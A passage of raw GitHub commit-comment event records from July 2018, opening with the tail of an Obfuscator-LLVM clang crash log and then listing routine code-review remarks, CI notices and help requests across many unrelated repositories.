/opt/obfuscator.llvm-6.0.0.build/lib/clang/6.0.0/include -internal-externc-isystem /usr/include/x86_64-linux-gnu -internal-externc-isystem /include -internal-externc-isystem /usr/include -O2 -fdeprecated-macro -fdebug-compilation-dir /home/msc/Workspaces/o-llvm-workspace/build-singlefile-Desktop-Debug -ferror-limit 19 -fmessage-length 0 -fobjc-runtime=gcc -fcxx-exceptions -fexceptions -fdiagnostics-show-option -vectorize-loops -vectorize-slp -mllvm -sub -mllvm -sub_loop=3 -mllvm -fla -mllvm -spli -mllvm -split_num=2 -mllvm -bcf -mllvm -bcf_loop=2 -mllvm -sobf -mllvm -debug-only=sobf -o moc_testclass.o -x c++ moc_testclass.cpp \r\n1.\t<eof> parser at end of file\r\n2.\tPer-module optimization passes\r\n3.\tRunning pass 'Global variable (i.e., const char*) diversification pass' on module 'moc_testclass.cpp'.\r\nclang-6.0: error: unable to execute command: Aborted (core dumped)\r\nclang-6.0: error: clang frontend command failed due to signal (use -v to see invocation)\r\nclang version 6.0.0 (tags/RELEASE_600/final)\r\nTarget: x86_64-unknown-linux-gnu\r\nThread model: posix\r\nInstalledDir: /opt/obfuscator/bin\r\nclang-6.0: note: diagnostic msg: PLEASE submit a bug report to http://o-llvm.org/ and include the crash backtrace, preprocessed source, and associated run script.\r\nclang-6.0: note: diagnostic msg: \r\n********************\r\n\r\nPLEASE ATTACH THE FOLLOWING FILES TO THE BUG REPORT:\r\nPreprocessed source(s) and associated run script(s) are located at:\r\nclang-6.0: note: diagnostic msg: /tmp/moc_testclass-cf1622.cpp\r\nclang-6.0: note: diagnostic msg: /tmp/moc_testclass-cf1622.sh\r\nclang-6.0: note: diagnostic msg: \r\n\r\n********************\r\nMakefile:320: recipe for target 'moc_testclass.o' failed\r\nmake: *** [moc_testclass.o] Error 254\r\n12:17:29: The process \"/usr/bin/make\" exited with code 2.\r\nError while building/deploying project singlefile (kit: Desktop)\r\nWhen executing step \"Make\"\r\n12:17:29: Elapsed time: 01:25.\r\n```\r\n\r\nLooks like it is the same bug."}},"created_at":"2018-07-02T10:23:13Z"}
{"id":"7905792299","type":"CommitCommentEvent","actor":{"login":"maruchooo"},"repo":{"name":"minglich/logitech-pubg"},"payload":{"comment":{"id":29564200,"position":null,"line":null,"path":null,"commit_id":"4f7447f08104706c537e4fd119dfa4a0afa3b799","created_at":"2018-07-02T10:23:19Z","updated_at":"2018-07-02T10:23:19Z","author_association":"NONE","body":"@minglich wich one????"}},"created_at":"2018-07-02T10:23:19Z"}
{"id":"7905792705","type":"CommitCommentEvent","actor":{"login":"markkovari"},"repo":{"name":"green-fox-academy/KingaBernhardt"},"payload":{"comment":{"id":29564201,"position":5,"line":4,"path":"week-07/day-4/FoxClub/FoxClub/Views/Login/Info.cshtml","commit_id":"62ba6c1af2b6a9be06b006e4a6f5d8d42a0d39d5","created_at":"2018-07-02T10:23:25Z","updated_at":"2018-07-02T10:23:25Z","author_association":"NONE","body":"Adding alt to an image is good, please don't delete it. It is good to put it there, cause the blinds and the ones who cannot see well will use that field."}},"created_at":"2018-07-02T10:23:25Z"}
{"id":"7905793301","type":"CommitCommentEvent","actor":{"login":"joel-costigliola"},"repo":{"name":"stovocor/assertj-core"},"payload":{"comment":{"id":29564203,"position":9,"line":2623,"path":"src/main/java/org/assertj/core/api/Assertions.java","commit_id":"44b56bf8e510783c11e0f3d96c71e3574b00b728","created_at":"2018-07-02T10:23:32Z","updated_at":"2018-07-02T10:23:32Z","author_association":"NONE","body":"let's add a note to make it clear `Iterator` assertions are limited and that users should use `toIterable` to get the richer Iterable assertions."}},"created_at":"2018-07-02T10:23:32Z"}
{"id":"7905817668","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29564261,"position":null,"line":null,"path":null,"commit_id":"a1cf4e7574f66e1880f4bec488770e5547413197","created_at":"2018-07-02T10:28:36Z","updated_at":"2018-07-02T10:28:36Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-02T10:28:36Z"}
{"id":"7905818890","type":"CommitCommentEvent","actor":{"login":"collabTester18"},"repo":{"name":"collabTester18/test"},"payload":{"comment":{"id":29564270,"position":null,"line":null,"path":null,"commit_id":"d4f01c981eb584f935e9dcc3a93b80141a9ab8b7","created_at":"2018-07-02T10:28:51Z","updated_at":"2018-07-02T10:28:51Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://217.170.125.19:40101/ui#review:id=4)"}},"created_at":"2018-07-02T10:28:51Z"}
{"id":"7905818947","type":"CommitCommentEvent","actor":{"login":"collabTester18"},"repo":{"name":"collabTester18/test"},"payload":{"comment":{"id":29564271,"position":null,"line":null,"path":null,"commit_id":"1ad1880fd75f479be5afff329223d909ae372548","created_at":"2018-07-02T10:28:52Z","updated_at":"2018-07-02T10:28:52Z","author_association":"OWNER","body":"Collaborator: Review for this commit was created. [Link to review](http://217.170.125.19:40101/ui#review:id=4)"}},"created_at":"2018-07-02T10:28:52Z"}
{"id":"7905819082","type":"CommitCommentEvent","actor":{"login":"jwikman"},"repo":{"name":"CloudReadySoftware/crs-al-language-extension"},"payload":{"comment":{"id":29564272,"position":null,"line":null,"path":null,"commit_id":"51f1cd023a9034a8c9a562094499d549d0987613","created_at":"2018-07-02T10:28:54Z","updated_at":"2018-07-02T10:28:54Z","author_association":"CONTRIBUTOR","body":"@waldo1001, please update package.json with the same tips :-)\r\n\r\nI know that I'm bad at reading readme files, and I assume that I'm not alone. I prefer if the documentation is where you need it (tooltips, contextual help etc). In this case as a comment when you are changing the setting. Make sense? ;-)"}},"created_at":"2018-07-02T10:28:54Z"}
{"id":"7905819283","type":"CommitCommentEvent","actor":{"login":"bouncyball-git"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29564273,"position":null,"line":null,"path":null,"commit_id":"526cbb22be0db1632166b802181a3bc58237c701","created_at":"2018-07-02T10:28:56Z","updated_at":"2018-07-02T10:28:56Z","author_association":"COLLABORATOR","body":"@masc4ii: I hope I have not missed anything :) like settings saving etc..."}},"created_at":"2018-07-02T10:28:56Z"}
{"id":"7905822730","type":"CommitCommentEvent","actor":{"login":"bouncyball-git"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29564284,"position":null,"line":null,"path":null,"commit_id":"526cbb22be0db1632166b802181a3bc58237c701","created_at":"2018-07-02T10:29:43Z","updated_at":"2018-07-02T10:29:43Z","author_association":"COLLABORATOR","body":"Premiere and many other NLs open this codec directly."}},"created_at":"2018-07-02T10:29:43Z"}
{"id":"7905827048","type":"CommitCommentEvent","actor":{"login":"eastsideod"},"repo":{"name":"LoperDog/libgs"},"payload":{"comment":{"id":29564295,"position":2,"line":1,"path":"libgsCore/include/network/USession.h","commit_id":"5838df96dee394da4c2226046a379624fadcc5ff","created_at":"2018-07-02T10:30:37Z","updated_at":"2018-07-02T10:30:37Z","author_association":"COLLABORATOR","body":"오타"}},"created_at":"2018-07-02T10:30:37Z"}
{"id":"7905828474","type":"CommitCommentEvent","actor":{"login":"eastsideod"},"repo":{"name":"LoperDog/libgs"},"payload":{"comment":{"id":29564299,"position":27,"line":30,"path":"libgsCore/include/network/asio_server.h","commit_id":"5838df96dee394da4c2226046a379624fadcc5ff","created_at":"2018-07-02T10:30:54Z","updated_at":"2018-07-02T10:30:54Z","author_association":"COLLABORATOR","body":"buffer [] X"}},"created_at":"2018-07-02T10:30:54Z"}
{"id":"7905828575","type":"CommitCommentEvent","actor":{"login":"mfizz1"},"repo":{"name":"bobi/xiaomi_gdrive"},"payload":{"comment":{"id":29564300,"position":null,"line":null,"path":null,"commit_id":"b75cd49d28b980d9d7fe6ed4502a3a728e761a62","created_at":"2018-07-02T10:30:56Z","updated_at":"2018-07-02T10:30:56Z","author_association":"NONE","body":"I will try a few things tonight and I'll send you the update, perhaps you can pull into your project."}},"created_at":"2018-07-02T10:30:56Z"}
{"id":"7905829042","type":"CommitCommentEvent","actor":{"login":"joel-costigliola"},"repo":{"name":"stovocor/assertj-core"},"payload":{"comment":{"id":29564301,"position":39,"line":39,"path":"src/test/java/org/assertj/core/api/iterator/IteratorAssert_isExhausted_Test.java","commit_id":"44b56bf8e510783c11e0f3d96c71e3574b00b728","created_at":"2018-07-02T10:31:01Z","updated_at":"2018-07-02T10:31:01Z","author_association":"NONE","body":"let's use GIVEN WHEN THEN and `catchThrowable` as in:\r\n```java\r\n    // GIVEN\r\n    SoftAssertions softly = new SoftAssertions();\r\n    softly.fail(\"failure\", throwRuntimeException());\r\n    // WHEN\r\n    AssertionError error = catchThrowableOfType(() -> softly.assertAll(), AssertionError.class);\r\n    // THEN\r\n    assertThat(error).hasMessage ... \r\n```"}},"created_at":"2018-07-02T10:31:01Z"}
{"id":"7905831941","type":"CommitCommentEvent","actor":{"login":"eugenern"},"repo":{"name":"eugenern/Mock-Draft-Evaluator"},"payload":{"comment":{"id":29564307,"position":null,"line":null,"path":null,"commit_id":"94d84b8ee928deef75ee515db14c2cd01a70b358","created_at":"2018-07-02T10:31:38Z","updated_at":"2018-07-02T10:31:38Z","author_association":"OWNER","body":"Not sure how to get text to properly display with UTF-8 encoding. For example, I want the name \"Luka Dončić\" to show up in the console as normal."}},"created_at":"2018-07-02T10:31:38Z"}
{"id":"7905832006","type":"CommitCommentEvent","actor":{"login":"jt-nti"},"repo":{"name":"jt-nti/blockchain-starter-kit-staging"},"payload":{"comment":{"id":29564309,"position":null,"line":null,"path":null,"commit_id":"901ba76b62c48c06395e969ed5559784f9764947","created_at":"2018-07-02T10:31:39Z","updated_at":"2018-07-02T10:31:39Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/a721e67b-3c32-4033-a298-fb5b5817b995?env_id=ibm%3Ayp%3Aus-south \"blockchain-20180621131227171\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/2c4f747a-bf40-48e3-ad7f-057bc29baa9e?env_id=ibm%3Ayp%3Aus-south \"blockchain-20180621131227171\") deployed [blockchain-starter-kit-staging](https://github.com/jt-nti/blockchain-starter-kit-staging/releases/tag/deploy-ibm-ys1-us-south-jamest-uk.ibm.com-blockchain-20180702-103139 \"deploy-ibm-ys1-us-south-jamest-uk.ibm.com-blockchain-20180702-103139\") to [blockchain](https://console.stage1.bluemix.net/apps/29186ede-8a67-4dce-b6fd-2eb4c5551c85?env_id=ibm:ys1:us-south \"ibm:ys1:us-south:jamest@uk.ibm.com:blockchain\"), including this commit"}},"created_at":"2018-07-02T10:31:39Z"}
{"id":"7905832503","type":"CommitCommentEvent","actor":{"login":"Staars"},"repo":{"name":"Staars/build"},"payload":{"comment":{"id":29564312,"position":null,"line":null,"path":null,"commit_id":"332ebdd67ee7cfd6264a3a52ba591e43fc1ed62d","created_at":"2018-07-02T10:31:46Z","updated_at":"2018-07-02T10:31:46Z","author_association":"OWNER","body":"Of course you are right. \nI had made a test build and saw the red „b“ for board specific u-boot-patch, which my brain translated to „error“. My fault !! (but maybe you can change the color to a less alarming one?)\n\na few notes:\nExternal SD-Card in u-boot works and I can boot from it, but after system start up it is lost. There are a few error messages in the log, which are new to me. I have to read a thing or two about it.\n\nReboot works now, which is really nice.\n\n\n\nI see, if I can fix some things, but first I have to understand what’s going on.\n\n> Am 02.07.2018 um 09:56 schrieb Igor Pečovnik <notifications@github.com>:\n> \n> Z28 u-boot should be fixed with this commit while mainline u-boot doesn't want to compile for any of rk3328 boards.\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub <https://github.com/Staars/build/commit/332ebdd67ee7cfd6264a3a52ba591e43fc1ed62d#commitcomment-29562379>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AFOiZCvp9H9ZSEEIrVFthinerBTzyjVtks5uCdIogaJpZM4U-1-E>.\n> \n\n"}},"created_at":"2018-07-02T10:31:46Z"}
{"id":"7905838523","type":"CommitCommentEvent","actor":{"login":"stevenringo"},"repo":{"name":"FearTheBadger/fluent-plugin-pg-logical"},"payload":{"comment":{"id":29564326,"position":5,"line":152,"path":"lib/fluent/plugin/in_pg_logical.rb","commit_id":"b5087025698b419c4cbc09e6b7d1ca5972af5169","created_at":"2018-07-02T10:33:07Z","updated_at":"2018-07-02T10:33:07Z","author_association":"NONE","body":"Suggest changing to \r\n```\r\n@router.emit(@tag, Fluent::Engine.now, JSON.parse(wal[:data]))\r\n```"}},"created_at":"2018-07-02T10:33:07Z"}
{"id":"7905841348","type":"CommitCommentEvent","actor":{"login":"markkovari"},"repo":{"name":"green-fox-academy/KingaBernhardt"},"payload":{"comment":{"id":29564336,"position":null,"line":null,"path":null,"commit_id":"62ba6c1af2b6a9be06b006e4a6f5d8d42a0d39d5","created_at":"2018-07-02T10:33:44Z","updated_at":"2018-07-02T10:33:44Z","author_association":"NONE","body":"Nice and understandable. If you keep it that clean and you separate the functionalities that way, you and anyone else will understand it. 👍 "}},"created_at":"2018-07-02T10:33:44Z"}
{"id":"7905842681","type":"CommitCommentEvent","actor":{"login":"gdelhumeau"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29564338,"position":5,"line":230,"path":"xwiki-platform-core/xwiki-platform-notifications/xwiki-platform-notifications-ui/src/main/resources/XWiki/Notifications/Code/Translations.xml","commit_id":"306ad5c36c02a525b3700a8712f111426ae9fa5d","created_at":"2018-07-02T10:34:03Z","updated_at":"2018-07-02T10:34:03Z","author_association":"MEMBER","body":"I really appreciate your help on English phrasing. When it comes to French, I love having well-written sentences so it's important for me that it's the same for English. But if you wish, you could simply modify the resource file without asking me. We're developing a wiki, after all :)"}},"created_at":"2018-07-02T10:34:03Z"}
{"id":"7905843268","type":"CommitCommentEvent","actor":{"login":"Sourour93"},"repo":{"name":"robokoding/STK500"},"payload":{"comment":{"id":29564340,"position":null,"line":null,"path":null,"commit_id":"71096e274ddea21167993823703aec69ff1171d8","created_at":"2018-07-02T10:34:11Z","updated_at":"2018-07-02T10:34:11Z","author_association":"NONE","body":"Hi, \r\nActually, I'm trying to program Arduino over WIFI with the ESP8266 module.\r\nI rely on the work done by oscar which consistes in creating a python server script that communicates with firmware running on the Arduino. Unfortunaltely, I'm facing a problem with the protocol STK500 written in python. In Fact, everytime I Try to connect with the Arduino bootloader, I get a failed Connection message. I used also your sketch update stk500 python but in vain. Could  you help me  please ?  Do I have to flash the Arduino with a  specific program to make it understand the STK500 protocol or am I  supposed to use another communication module as Bluetooth.?\r\nThank you in advance. \r\n"}},"created_at":"2018-07-02T10:34:11Z"}
{"id":"7905844531","type":"CommitCommentEvent","actor":{"login":"chrislo"},"repo":{"name":"bhrrc/modernslaveryregistry.org"},"payload":{"comment":{"id":29564343,"position":8,"line":34,"path":"app/models/statement_stats.rb","commit_id":"da803d86101bcbe6612f2c89ffd5cde484826ed9","created_at":"2018-07-02T10:34:29Z","updated_at":"2018-07-02T10:34:29Z","author_association":"CONTRIBUTOR","body":"@aslakhellesoy can you remember where you saw this bug? There is a `before_create` hook on Statement that sets `date_seen` (which `year_month` is derived from) and as far as I can see there's no records in the database where `statements.date_seen IS NULL` (it has a `NOT NULL` constraint). "}},"created_at":"2018-07-02T10:34:29Z"}
{"id":"7905846210","type":"CommitCommentEvent","actor":{"login":"ezenko"},"repo":{"name":"colours/nhtv"},"payload":{"comment":{"id":29564346,"position":null,"line":null,"path":null,"commit_id":"02d433ca0e58c5f0261411ad62629163cbe129c3","created_at":"2018-07-02T10:34:50Z","updated_at":"2018-07-02T10:34:50Z","author_association":"NONE","body":"Created multidev environment [nhtv#ci-223](https://dashboard.pantheon.io/sites/a5faca03-4b4c-4936-95b8-6410ab7b2c55#ci-223).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-223-nhtv.pantheonsite.io/)"}},"created_at":"2018-07-02T10:34:50Z"}
{"id":"7905846381","type":"CommitCommentEvent","actor":{"login":"markkovari"},"repo":{"name":"green-fox-academy/KingaBernhardt"},"payload":{"comment":{"id":29564347,"position":null,"line":null,"path":null,"commit_id":"b39cec83a6acaf1a8d1d54ca38ad6b98801aadde","created_at":"2018-07-02T10:34:53Z","updated_at":"2018-07-02T10:34:53Z","author_association":"NONE","body":"And actually, I am proud of you. I can see how often you commit, that will give you so much long-term 👍 "}},"created_at":"2018-07-02T10:34:53Z"}
{"id":"7905856241","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddt-tomita/meikai_java_2018_04"},"payload":{"comment":{"id":29564369,"position":29,"line":29,"path":"E03/E4/src/e4_12/E4_12.java","commit_id":"922019375fab316f50c2d76c1333335feb629413","created_at":"2018-07-02T10:37:03Z","updated_at":"2018-07-02T10:37:03Z","author_association":"COLLABORATOR","body":"柴田\r\nfor文で作成しなければということでfor文で作成した旨伺いました。\r\n今回はこれでOKとします。次回より読みやすい方法で記載するようにしてください。"}},"created_at":"2018-07-02T10:37:03Z"}
{"id":"7905856533","type":"CommitCommentEvent","actor":{"login":"myrrlyn"},"repo":{"name":"myrrlyn/bitvec"},"payload":{"comment":{"id":29564370,"position":null,"line":null,"path":null,"commit_id":"dd773976ab8bbdd9a3d0d814ef9e80fddd83ca2c","created_at":"2018-07-02T10:37:07Z","updated_at":"2018-07-02T10:37:07Z","author_association":"OWNER","body":"Thanks! I didn't even think to specialize the Iterator yet, this is great!"}},"created_at":"2018-07-02T10:37:07Z"}
{"id":"7905865629","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29564394,"position":5,"line":230,"path":"xwiki-platform-core/xwiki-platform-notifications/xwiki-platform-notifications-ui/src/main/resources/XWiki/Notifications/Code/Translations.xml","commit_id":"306ad5c36c02a525b3700a8712f111426ae9fa5d","created_at":"2018-07-02T10:39:10Z","updated_at":"2018-07-02T10:39:10Z","author_association":"MEMBER","body":"yes sure except that 1) I didn't have the time (in other words, reviewing a commit or fixing it doesn't take the same time) 2) if I don't mention it here then you might not see it and thus you might not improve for the future and 3) if I have to comment here and commit it too it's more work and 4) some people might resent someone else fixing their English by committing (they're also suggestions only and others may comment back on my suggestions). \r\n\r\nAlso not that the fact that we're developing a wiki is not really relevant here ;) This is about committing in git. What's more relevant is the fact that we don't have code ownership so anyone can commit anywhere in the code base."}},"created_at":"2018-07-02T10:39:10Z"}
{"id":"7905872381","type":"CommitCommentEvent","actor":{"login":"volkova229"},"repo":{"name":"IlijaT/TodoAPP---Frontend"},"payload":{"comment":{"id":29564405,"position":24,"line":17,"path":"src/App.vue","commit_id":"ec10e7696d8d609241cdc1b551728b6ebed581e2","created_at":"2018-07-02T10:40:40Z","updated_at":"2018-07-02T10:40:40Z","author_association":"COLLABORATOR","body":"Ovo opet nije dobro.\r\n```\r\nimport AppHeader from './components/header.vue\r\n\r\n components: {\r\n  AppHeader\r\n}\r\n```"}},"created_at":"2018-07-02T10:40:40Z"}
{"id":"7905882769","type":"CommitCommentEvent","actor":{"login":"waldo1001"},"repo":{"name":"CloudReadySoftware/crs-al-language-extension"},"payload":{"comment":{"id":29564423,"position":null,"line":null,"path":null,"commit_id":"51f1cd023a9034a8c9a562094499d549d0987613","created_at":"2018-07-02T10:43:02Z","updated_at":"2018-07-02T10:43:02Z","author_association":"CONTRIBUTOR","body":"Done!\r\nhttps://github.com/CloudReadySoftware/crs-al-language-extension/commit/6dc2d184384190da1cdb5439d3747ba15d39bc00"}},"created_at":"2018-07-02T10:43:02Z"}
{"id":"7905886021","type":"CommitCommentEvent","actor":{"login":"San351998"},"repo":{"name":"San351998/Python-Assignment-"},"payload":{"comment":{"id":29564427,"position":null,"line":null,"path":null,"commit_id":"62b96b750fa72be9edf24cd68dca544d33a7a37b","created_at":"2018-07-02T10:43:50Z","updated_at":"2018-07-02T10:43:50Z","author_association":"OWNER","body":"assignment no.17"}},"created_at":"2018-07-02T10:43:50Z"}
{"id":"7905889286","type":"CommitCommentEvent","actor":{"login":"sophokles73"},"repo":{"name":"vert-x3/vertx-proton"},"payload":{"comment":{"id":29564434,"position":8,"line":331,"path":"src/main/java/io/vertx/proton/ProtonLink.java","commit_id":"35eeb59f82bf8f95d7e7a6b1b0d8a296ede09f2a","created_at":"2018-07-02T10:44:32Z","updated_at":"2018-07-02T10:44:32Z","author_association":"CONTRIBUTOR","body":"I appreciate the effort of exposing this method. However, IMHO a *normal* user of the library will not understand its purpose/necessity. The reason we ran into the problem in the first place was, that we assumed that the link will be *done with* once we invoked its *close()* method, i.e. the expectation was/is that the link object will be GCed onces all references to it from application code have been removed. So, FMPOV the JavaDoc for the *close* methods should explicitly state and explain that this assumption is wrong and will lead to memory leaks if *free* is not explicitly invoked on the link/session."}},"created_at":"2018-07-02T10:44:32Z"}
{"id":"7905889380","type":"CommitCommentEvent","actor":{"login":"vargas06"},"repo":{"name":"schildbach/public-transport-enabler"},"payload":{"comment":{"id":29564435,"position":2,"line":45,"path":"enabler/src/de/schildbach/pte/MvvProvider.java","commit_id":"6d937b539dff1254982fdd43ca99584b8ffa10a9","created_at":"2018-07-02T10:44:33Z","updated_at":"2018-07-02T10:44:33Z","author_association":"NONE","body":"Verificar"}},"created_at":"2018-07-02T10:44:33Z"}
{"id":"7905889759","type":"CommitCommentEvent","actor":{"login":"indeveler"},"repo":{"name":"Yggdroot/indentLine"},"payload":{"comment":{"id":29564436,"position":null,"line":null,"path":null,"commit_id":"3d30f26c33a67b6bd947eba6e6b2c3bb574f9445","created_at":"2018-07-02T10:44:37Z","updated_at":"2018-07-02T10:44:37Z","author_association":"NONE","body":"Awesome!"}},"created_at":"2018-07-02T10:44:37Z"}
{"id":"7905890583","type":"CommitCommentEvent","actor":{"login":"jwikman"},"repo":{"name":"CloudReadySoftware/crs-al-language-extension"},"payload":{"comment":{"id":29564437,"position":null,"line":null,"path":null,"commit_id":"6dc2d184384190da1cdb5439d3747ba15d39bc00","created_at":"2018-07-02T10:44:48Z","updated_at":"2018-07-02T10:44:48Z","author_association":"CONTRIBUTOR","body":"excellent! :)\r\n\r\nThis is the beauty (and annoyance) with a public repo ;-)"}},"created_at":"2018-07-02T10:44:48Z"}
{"id":"7905893919","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/Sorsi"},"payload":{"comment":{"id":29564446,"position":null,"line":null,"path":null,"commit_id":"e2d5c34fe7f22a0244f028748a6c1b2989b5b34d","created_at":"2018-07-02T10:45:32Z","updated_at":"2018-07-02T10:45:32Z","author_association":"NONE","body":"nice"}},"created_at":"2018-07-02T10:45:32Z"}
{"id":"7905894778","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/Sorsi"},"payload":{"comment":{"id":29564448,"position":5,"line":15,"path":"week-07/day-02/prime-squares/prime-squares.js","commit_id":"fa77db8da7f67c06e6a2752847c35781e227de29","created_at":"2018-07-02T10:45:45Z","updated_at":"2018-07-02T10:45:45Z","author_association":"NONE","body":"missing semicolon"}},"created_at":"2018-07-02T10:45:45Z"}
{"id":"7905896232","type":"CommitCommentEvent","actor":{"login":"vargas06"},"repo":{"name":"bitcoin-wallet/bitcoin-wallet"},"payload":{"comment":{"id":29564451,"position":null,"line":null,"path":null,"commit_id":"ff2e563076f061877ab04e6df553c477dd6d3045","created_at":"2018-07-02T10:46:05Z","updated_at":"2018-07-02T10:46:05Z","author_association":"NONE","body":"Verificar"}},"created_at":"2018-07-02T10:46:05Z"}
{"id":"7905898245","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/Sorsi"},"payload":{"comment":{"id":29564454,"position":4,"line":4,"path":"week-07/day-03/bookstore/script.js","commit_id":"430672d39e85333846a1c0fe7bcbc173aed5fdee","created_at":"2018-07-02T10:46:33Z","updated_at":"2018-07-02T10:46:33Z","author_association":"NONE","body":"`http://localhost:3000` should be in a separate variable"}},"created_at":"2018-07-02T10:46:33Z"}
{"id":"7905903273","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/Sorsi"},"payload":{"comment":{"id":29564462,"position":null,"line":null,"path":null,"commit_id":"6d085d496fb4af2bf768d43470b7c31d85bbe667","created_at":"2018-07-02T10:47:40Z","updated_at":"2018-07-02T10:47:40Z","author_association":"NONE","body":"i like your commit workflow, keep it up!"}},"created_at":"2018-07-02T10:47:40Z"}
{"id":"7905904696","type":"CommitCommentEvent","actor":{"login":"ChildishChange"},"repo":{"name":"ChildishChange/samples-for-ai"},"payload":{"comment":{"id":29564464,"position":155,"line":155,"path":"projects/CustomVisionUWPDemo/CustomVisionUWP.App/CustomVisionUWP.App.csproj","commit_id":"d5d5c37c48211fdd77f5646f2ed2e22fcb7ed1e3","created_at":"2018-07-02T10:47:59Z","updated_at":"2018-07-02T10:47:59Z","author_association":"OWNER","body":"EOL"}},"created_at":"2018-07-02T10:47:59Z"}
{"id":"7905905495","type":"CommitCommentEvent","actor":{"login":"ChildishChange"},"repo":{"name":"ChildishChange/samples-for-ai"},"payload":{"comment":{"id":29564469,"position":14,"line":14,"path":"projects/CustomVisionUWPDemo/CustomVisionUWP.App/CustomVisionUWP.App.csproj.user","commit_id":"d5d5c37c48211fdd77f5646f2ed2e22fcb7ed1e3","created_at":"2018-07-02T10:48:10Z","updated_at":"2018-07-02T10:48:10Z","author_association":"OWNER","body":"EOL"}},"created_at":"2018-07-02T10:48:10Z"}
{"id":"7905905940","type":"CommitCommentEvent","actor":{"login":"pjkgyang"},"repo":{"name":"pjkgyang/Assistant-pc"},"payload":{"comment":{"id":29564470,"position":null,"line":null,"path":null,"commit_id":"479b11aa0f37db811b069ad0c21850e3cb62b641","created_at":"2018-07-02T10:48:14Z","updated_at":"2018-07-02T10:48:14Z","author_association":"OWNER","body":"113"}},"created_at":"2018-07-02T10:48:14Z"}
{"id":"7905907864","type":"CommitCommentEvent","actor":{"login":"ChildishChange"},"repo":{"name":"ChildishChange/samples-for-ai"},"payload":{"comment":{"id":29564474,"position":28,"line":28,"path":"projects/CustomVisionUWPDemo/CustomVisionUWP.App/Package.appxmanifest","commit_id":"d5d5c37c48211fdd77f5646f2ed2e22fcb7ed1e3","created_at":"2018-07-02T10:48:41Z","updated_at":"2018-07-02T10:48:41Z","author_association":"OWNER","body":"EOL"}},"created_at":"2018-07-02T10:48:41Z"}
{"id":"7905908990","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/Sorsi"},"payload":{"comment":{"id":29564476,"position":null,"line":null,"path":null,"commit_id":"b1fe60b769241b047c8210070636bf17fb4c803d","created_at":"2018-07-02T10:48:57Z","updated_at":"2018-07-02T10:48:57Z","author_association":"NONE","body":"nice!"}},"created_at":"2018-07-02T10:48:57Z"}
{"id":"7905909591","type":"CommitCommentEvent","actor":{"login":"ChildishChange"},"repo":{"name":"ChildishChange/samples-for-ai"},"payload":{"comment":{"id":29564477,"position":162,"line":162,"path":"projects/CustomVisionUWPDemo/CustomVisionUWP.App/Strings/en-US/Resources.resw","commit_id":"d5d5c37c48211fdd77f5646f2ed2e22fcb7ed1e3","created_at":"2018-07-02T10:49:03Z","updated_at":"2018-07-02T10:49:03Z","author_association":"OWNER","body":"EOL"}},"created_at":"2018-07-02T10:49:03Z"}
{"id":"7905909687","type":"CommitCommentEvent","actor":{"login":"40huo"},"repo":{"name":"NimaQu/ss-panel-v3-mod_Uim"},"payload":{"comment":{"id":29564478,"position":13,"line":55,"path":"app/Controllers/Admin/NodeController.php","commit_id":"182a81e822f7a723deaa761a7269133b365a10a9","created_at":"2018-07-02T10:49:05Z","updated_at":"2018-07-02T10:49:05Z","author_association":"NONE","body":"括号没闭合大哥"}},"created_at":"2018-07-02T10:49:05Z"}
{"id":"7905911282","type":"CommitCommentEvent","actor":{"login":"gyorkibence"},"repo":{"name":"green-fox-academy/Sorsi"},"payload":{"comment":{"id":29564483,"position":null,"line":null,"path":null,"commit_id":"b3b1cf53a79a62dc63d30c43e477fa7e936c2f35","created_at":"2018-07-02T10:49:27Z","updated_at":"2018-07-02T10:49:27Z","author_association":"NONE","body":"please add the .env file to  the gitignore"}},"created_at":"2018-07-02T10:49:27Z"}
{"id":"7905911947","type":"CommitCommentEvent","actor":{"login":"lizmat"},"repo":{"name":"rakudo/rakudo"},"payload":{"comment":{"id":29564485,"position":null,"line":null,"path":null,"commit_id":"72ccd432a7155e408791da6cafd3b4c408661c04","created_at":"2018-07-02T10:49:36Z","updated_at":"2018-07-02T10:49:36Z","author_association":"CONTRIBUTOR","body":"Oops, this should have referenced GH#2010"}},"created_at":"2018-07-02T10:49:36Z"}
